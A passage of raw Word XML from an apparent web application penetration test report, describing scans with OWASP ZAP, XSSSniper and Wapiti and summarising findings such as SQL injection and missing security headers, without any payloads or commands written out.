      <w:r w:rsidR="00E4511E">
        <w:t xml:space="preserve"> malicious scripts into the web application.</w:t>
      </w:r>
      <w:r w:rsidR="00CD6587">
        <w:t xml:space="preserve"> The results of </w:t>
      </w:r>
      <w:r w:rsidR="008942BF">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00CD6587">
        <w:t>vulnerabilit</w:t>
      </w:r>
      <w:r w:rsidR="008942BF">
        <w:t>ies</w:t>
      </w:r>
      <w:r w:rsidR="00CD6587">
        <w:t xml:space="preserve"> discovered would be flagged under alerts where the request and response can be analyzed.</w:t>
      </w:r>
      <w:r w:rsidR="00AD6A2B">
        <w:t xml:space="preserve"> Refer to </w:t>
      </w:r>
      <w:hyperlink w:anchor="_OWASP_ZAP">
        <w:r w:rsidR="00AD6A2B" w:rsidRPr="2B7306D2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Appendix B</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AD6A2B">
        <w:t xml:space="preserve"> on setting up ZAP with a session cookie.</w:t>
      </w:r>
      <w:r w:rsidR="006356E6">
        <w:t xml:space="preserve"> Also, </w:t>
      </w:r>
      <w:r w:rsidR="001C6CA4">
        <w:t>two</w:t>
      </w:r>
      <w:r w:rsidR="006356E6">
        <w:t xml:space="preserve"> separate scans are </w:t>
      </w:r>
      <w:r w:rsidR="00DA76AA">
        <w:t>performed,</w:t>
      </w:r>
      <w:r w:rsidR="006356E6">
        <w:t xml:space="preserve"> and the results are compiled as the output </w:t>
      </w:r>
      <w:r w:rsidR="002B7E9C">
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="006356E6">
        <w:t>the user and admin are different.</w:t>
      </w:r>
      <w:r w:rsidR="007309EE" w:rsidRPr="007309EE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D9DCB2" w14:textId="00A884A7" w:rsidR="008F0625" w:rsidRDefault="007309EE" w:rsidP="008F0625">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658260" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2E46F09D" wp14:editId="12AE2DCF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2605088</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>495300</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2014220" cy="176213"/>
                <wp:effectExtent l="0" t="0" r="24130" b="14605"/>
                <wp:wrapNone/>
                <wp:docPr id="72" name="Rectangle 72"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2014220" cy="1762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A99E36">
              <v:rect id="Rectangle 72" style="position:absolute;margin-left:205.15pt;margin-top:39pt;width:158.6pt;height:13.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113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23gQIAAGkFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtv2zAMvg/YfxB0X21na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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008F0625" w:rsidRPr="008730D4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18CA7801" wp14:editId="2A6A7E47">
            <wp:extent cx="4109012" cy="1394042"/>
            <wp:effectExtent l="0" t="0" r="6350"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10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId75"/>
                    <a:srcRect l="15784" b="24561"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4122487" cy="1398614"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB4677B" w14:textId="77777777" w:rsidR="008F0625" w:rsidRDefault="008F0625" w:rsidP="008F0625"/>
    <w:p w14:paraId="17EA6AFC" w14:textId="5A8B3EEE" w:rsidR="009509F0" w:rsidRDefault="0015090D" w:rsidP="008F0625">
      <w:r>
        <w:t xml:space="preserve">As depicted below, </w:t>
      </w:r>
      <w:r w:rsidR="008942BF">
        <w:t>a total</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r w:rsidR="007C1DCA">
        <w:t xml:space="preserve">17 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vulnerabilities </w:t>
      </w:r>
      <w:r w:rsidR="008942BF">
        <w:t xml:space="preserve">were </w:t>
      </w:r>
      <w:r>
        <w:t>discovered by the active scan</w:t>
      </w:r>
      <w:r w:rsidR="00536891">
        <w:t>ner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Some notable </w:t>
      </w:r>
      <w:r w:rsidR="00C14322">
        <w:t xml:space="preserve">results </w:t>
      </w:r>
      <w:r w:rsidR="00817087">
        <w:t xml:space="preserve">discovered are SQL Injection, Application Error </w:t>
      </w:r>
      <w:r w:rsidR="00785EEE">
        <w:t>Disclosure</w:t>
      </w:r>
      <w:r w:rsidR="002B7E9C">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00817087">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00E12035">
        <w:t>Vulnerable JS Library.</w:t>
      </w:r>
      <w:r w:rsidR="00AD0A93">
        <w:t xml:space="preserve"> These alerts </w:t>
      </w:r>
      <w:r w:rsidR="00B23D13">
        <w:t xml:space="preserve">would be verified by performing manual testing as seen later in the </w:t>
      </w:r>
      <w:r w:rsidR="00FD54F2">
        <w:t>following section.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBD3E8C" w14:textId="205FE6B1" w:rsidR="004878BE" w:rsidRPr="00EB75EC" w:rsidRDefault="0052283E" w:rsidP="006356E6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658268" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A21E23B" wp14:editId="0165D8D2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>390028</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>665</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1521111" cy="2114821"/>
                <wp:effectExtent l="0" t="0" r="22225" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="81" name="Rectangle 81"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1521111" cy="21148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9F8F8F">
              <v:rect id="Rectangle 81" style="position:absolute;margin-left:30.7pt;margin-top:.05pt;width:119.75pt;height:16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774B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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F06A5E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5636D6F4" wp14:editId="3AEE74C1">
            <wp:extent cx="5159680" cy="2901767"/>
            <wp:effectExtent l="0" t="0" r="317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78028" cy="2912086"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkStart w:id="72" w:name="_Toc93502870"/>
    </w:p>
    <w:p w14:paraId="7D39774C" w14:textId="0B3AD9AB" w:rsidR="00DD5EBC" w:rsidRDefault="007B3C7C" w:rsidP="00DD5EBC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc93526903"/>
      <w:bookmarkStart w:id="74" w:name="_Toc94100228"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>XSSSniper</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
      <w:bookmarkEnd w:id="73"/>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w14:paraId="023F4283" w14:textId="3D6A464E" w:rsidR="00802443" w:rsidRPr="00802443" w:rsidRDefault="00802443" w:rsidP="00802443">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Glenn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B735BD" w14:textId="521A05AD" w:rsidR="00980375" w:rsidRDefault="00980375" w:rsidP="00E77D9E">
      <w:r>
        <w:t xml:space="preserve">For identifying </w:t>
      </w:r>
      <w:r w:rsidR="000B2A4D">
        <w:t>potential Cross-Site Scripting</w:t>
      </w:r>
      <w:r w:rsidR="00815DC6">
        <w:t xml:space="preserve"> (XSS)</w:t>
      </w:r>
      <w:r w:rsidR="000B2A4D">
        <w:t xml:space="preserve"> weaknesses in the web application, </w:t>
      </w:r>
      <w:r w:rsidR="00815DC6">
        <w:t xml:space="preserve">an automatic </w:t>
      </w:r>
      <w:r w:rsidR="00B07AAB">
        <w:t xml:space="preserve">XSS discovery tool was used. XSSSniper works by </w:t>
      </w:r>
      <w:r w:rsidR="0014124B">
        <w:t xml:space="preserve">searching all hyperlinks from the starting webpage and </w:t>
      </w:r>
      <w:r w:rsidR="0060534E">
        <w:t>identifying</w:t>
      </w:r>
      <w:r w:rsidR="0014124B">
        <w:t xml:space="preserve"> input </w:t>
      </w:r>
      <w:r w:rsidR="004B7C04">
        <w:t>fields</w:t>
      </w:r>
      <w:r w:rsidR="0014124B">
        <w:t xml:space="preserve"> such as forms that might be vulnerable to XSS. It then recursively checks </w:t>
      </w:r>
      <w:r w:rsidR="00397C2B">
        <w:t>the discovered hyperlinks</w:t>
      </w:r>
      <w:r w:rsidR="001061C5">
        <w:t xml:space="preserve"> and repeats this process.</w:t>
      </w:r>
      <w:r w:rsidR="00310E3F">
        <w:t xml:space="preserve"> Since this web application </w:t>
      </w:r>
      <w:r w:rsidR="00E13E6D">
        <w:t>requires authentication, the cookie must be inserted into the command as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204129C6" w14:textId="33DE8419" w:rsidR="00D73CF5" w:rsidRPr="00980375" w:rsidRDefault="00D73CF5" w:rsidP="00E77D9E">
      <w:r>
        <w:t xml:space="preserve">However, as seen below, </w:t>
      </w:r>
      <w:r w:rsidR="00147FEA">
        <w:t>it has discovered some forms within the web application but failed to determine any XSS vulnerabilities.</w:t>
      </w:r>
      <w:r w:rsidR="005722F7">
        <w:t xml:space="preserve"> This will be verified </w:t>
      </w:r>
      <w:r w:rsidR="001E7F34">
        <w:t>through</w:t>
      </w:r>
      <w:r w:rsidR="005722F7">
        <w:t xml:space="preserve"> manual testing </w:t>
      </w:r>
      <w:r w:rsidR="003276DD">
        <w:t>in the later section.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27295509" w14:textId="7D4F4C0C" w:rsidR="007B3C7C" w:rsidRDefault="004D3A73" w:rsidP="00C57D2E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658269" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="66256D21" wp14:editId="3B512605">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>26002</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3252675</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1252425" cy="160074"/>
                <wp:effectExtent l="0" t="0" r="24130" b="11430"/>
                <wp:wrapNone/>
                <wp:docPr id="82" name="Rectangle 82"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1252425" cy="1600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E6AA03">
              <v:rect id="Rectangle 82" style="position:absolute;margin-left:2.05pt;margin-top:256.1pt;width:98.6pt;height:12.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1721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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007B3C7C" w:rsidRPr="00B12F05">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38063319" wp14:editId="29B6B646">
            <wp:extent cx="5943600" cy="3438525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="18946389" name="Picture 189463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9" name="Picture 18946389" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId77"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3438525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DE859B" w14:textId="12D91CDD" w:rsidR="00E447D6" w:rsidRDefault="00E447D6" w:rsidP="00C57D2E"/>
    <w:p w14:paraId="1B016A9C" w14:textId="77777777" w:rsidR="00F043A7" w:rsidRDefault="00F043A7">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc93526904"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9A0E26" w14:textId="1E9025A8" w:rsidR="00653371" w:rsidRDefault="00653371" w:rsidP="00653371">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc94100229"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Wapiti</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w14:paraId="2F78CA48" w14:textId="2B1DF094" w:rsidR="00C92C74" w:rsidRPr="00C92C74" w:rsidRDefault="00C92C74" w:rsidP="00C92C74">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C92C74">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by: Colin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A75FD51" w14:textId="1579F0BF" w:rsidR="00CC37B3" w:rsidRPr="00CC37B3" w:rsidRDefault="008C44B5" w:rsidP="00E77D9E">
      <w:r>
        <w:t>Wapiti is a</w:t>
      </w:r>
      <w:r w:rsidR="009F0F9B">
        <w:t>n open-source</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> web</w:t>
      </w:r>
      <w:r w:rsidR="00C92C74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC24D7">
        <w:t>application vulnerability scanner designed to perform black box scans</w:t>
      </w:r>
      <w:r w:rsidR="00AE0A47">
        <w:t xml:space="preserve"> by crawling the application and </w:t>
      </w:r>
      <w:r w:rsidR="22F44967">
        <w:t>finding</w:t>
      </w:r>
      <w:r w:rsidR="00AE0A47">
        <w:t xml:space="preserve"> an</w:t>
      </w:r>
      <w:r w:rsidR="00264267">
        <w:t>y possible entry points to inject</w:t>
      </w:r>
      <w:r w:rsidR="00890585">
        <w:t xml:space="preserve"> scripts or forms</w:t>
      </w:r>
      <w:r w:rsidR="00240DA6">
        <w:t>. In other terms, Wapiti acts like a fuzzer</w:t>
      </w:r>
      <w:r w:rsidR="00615DD9">
        <w:t xml:space="preserve"> injecting payloads in an automated fashion</w:t>
      </w:r>
      <w:r w:rsidR="00EF0922">
        <w:t xml:space="preserve"> in a tr</w:t>
      </w:r>
      <w:r w:rsidR="0055322D">
        <w:t>ia</w:t>
      </w:r>
      <w:r w:rsidR="00EF0922">
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="00C1440C">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00EF0922">
        <w:t>an</w:t>
      </w:r>
      <w:r w:rsidR="00AC7B84">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00C1440C">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00EF0922">
        <w:t xml:space="preserve">error format </w:t>
      </w:r>
      <w:r w:rsidR="006D5707">
        <w:t>to observe if the script or form is vulnerable to SQL,</w:t>
      </w:r>
      <w:r w:rsidR="0041783A">
        <w:t xml:space="preserve"> Cross-Site Scripting</w:t>
      </w:r>
      <w:r w:rsidR="00A270BC">
        <w:t xml:space="preserve"> (XXS)</w:t>
      </w:r>
      <w:r w:rsidR="00AF489C">
        <w:t>, X</w:t>
      </w:r>
      <w:r w:rsidR="0041783A">
        <w:t>ML</w:t>
      </w:r>
      <w:r w:rsidR="0051798C">
        <w:t xml:space="preserve"> External</w:t>
      </w:r>
      <w:r w:rsidR="0041783A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF489C">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="0041783A">
        <w:t>ntities</w:t>
      </w:r>
      <w:r w:rsidR="00AF489C">
        <w:t xml:space="preserve"> injections </w:t>
      </w:r>
      <w:r w:rsidR="00FD11E9">
        <w:t>amongst</w:t>
      </w:r>
      <w:r w:rsidR="00AF489C">
        <w:t xml:space="preserve"> the many </w:t>
      </w:r>
      <w:r w:rsidR="00542834">
        <w:t>records of vulnerabilit</w:t>
      </w:r>
      <w:r w:rsidR="009F0F9B">
        <w:t>ies analyzed against by Wapiti. To utilize the open-source tool, which requires the domain of the web application and the</w:t>
      </w:r>
      <w:r w:rsidR="00542834">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA4B4D">
        <w:t>directory location to place the scanning result upon completion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618C3DFC" w14:textId="4438BA92" w:rsidR="006E5079" w:rsidRDefault="00ED19FE" w:rsidP="00E77D9E">
      <w:r>
        <w:t>Upon analyzing the scanning results</w:t>
      </w:r>
      <w:r w:rsidR="00756A7D">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> it can be derived that</w:t>
      </w:r>
      <w:r w:rsidR="0043738B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA3D43">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="00CA651C">
        <w:t xml:space="preserve"> Content Policy header (CSP)</w:t>
      </w:r>
      <w:r w:rsidR="004B08C3">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00DA3D43">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004368C4">
        <w:t>X-Frame</w:t>
      </w:r>
      <w:r w:rsidR="00E12E8D">
        <w:t>, HSTS</w:t>
      </w:r>
      <w:r w:rsidR="004B7C04">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00CE7943">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="004368C4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00370673">
        <w:t>XSS protection</w:t>
      </w:r>
      <w:r w:rsidR="0036578B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C22402">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="0036578B">
        <w:t xml:space="preserve"> policies were not set</w:t>
      </w:r>
      <w:r w:rsidR="009D7B2B">
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:r w:rsidR="00807574">
        <w:t>the web</w:t>
      </w:r>
      <w:r w:rsidR="00C22402">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00807574">
        <w:t>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77CC" w14:paraId="6A44F60C" w14:textId="77777777" w:rsidTr="00E477CC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="591BC9B8" w14:textId="2C88E267" w:rsidR="00E477CC" w:rsidRDefault="00E477CC" w:rsidP="00CC37B3">
            <w:r w:rsidRPr="00CC37B3">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A6255FF" wp14:editId="4989E38A">
                  <wp:extent cx="2816590" cy="2984500"/>
                  <wp:effectExtent l="0" t="0" r="3175"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8"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2830947" cy="2999713"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A1672F6" w14:textId="65F0F735" w:rsidR="00E477CC" w:rsidRDefault="007F2A96" w:rsidP="00CC37B3">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658271" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0BD2FEAE" wp14:editId="28856822">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>683</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>1193261</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1221596" cy="95340"/>
                      <wp:effectExtent l="0" t="0" r="17145" b="19050"/>
                      <wp:wrapNone/>
                      <wp:docPr id="85" name="Rectangle 85"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="1221596" cy="95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B5343D">
                    <v:rect id="Rectangle 85" style="position:absolute;margin-left:.05pt;margin-top:93.95pt;width:96.2pt;height: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503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"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658270" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="40C29768" wp14:editId="57C9CBD4">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>31019</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>612552</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1191753" cy="95340"/>
                      <wp:effectExtent l="0" t="0" r="27940" b="19050"/>
                      <wp:wrapNone/>
                      <wp:docPr id="84" name="Rectangle 84"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="1191753" cy="95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744152">
                    <v:rect id="Rectangle 84" style="position:absolute;margin-left:2.45pt;margin-top:48.25pt;width:93.85pt;height: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901E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"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="00E477CC" w:rsidRPr="007A6835">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15E51CD3" wp14:editId="0977DB65">
                  <wp:extent cx="2003795" cy="2951215"/>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79"/>
                          <a:srcRect t="7915"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2034143" cy="29959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40D7BA" w14:textId="77777777" w:rsidR="00E477CC" w:rsidRDefault="00E477CC" w:rsidP="00CC37B3"/>
    <w:p w14:paraId="46AA8AE1" w14:textId="77777777" w:rsidR="00833930" w:rsidRDefault="00833930">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E26CC9" w14:textId="7F67A825" w:rsidR="00492C84" w:rsidRDefault="00B97216" w:rsidP="00492C84">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc93526905"/>
      <w:bookmarkStart w:id="78" w:name="_Toc94100230"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">OWASP </w:t>
      </w:r>
      <w:r w:rsidR="00375A32">
        <w:t>ZAP (</w:t>
      </w:r>
      <w:r w:rsidR="000D3594">
        <w:t>XSS Fuzzer)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w14:paraId="233998CB" w14:textId="4D585015" w:rsidR="0061628D" w:rsidRPr="0061628D" w:rsidRDefault="0061628D" w:rsidP="0061628D">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB5D64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Glenn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FDA129" w14:textId="1F55DCE8" w:rsidR="00F56280" w:rsidRPr="00974806" w:rsidRDefault="00AF0EF7" w:rsidP="00E77D9E">
      <w:r>
        <w:t>ZAP includes a fuzzing tool</w:t>
      </w:r>
